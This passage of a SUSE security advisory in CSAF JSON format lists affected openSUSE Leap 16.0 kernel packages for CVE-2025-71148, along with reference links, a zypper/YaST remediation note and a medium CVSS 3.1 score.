"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71148",
"url": "https://www.suse.com/security/cve/CVE-2025-71148"
},
{
"category": "external",
"summary": "SUSE Bug 1257159 for CVE-2025-71148",
"url": "https://bugzilla.suse.com/1257159"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
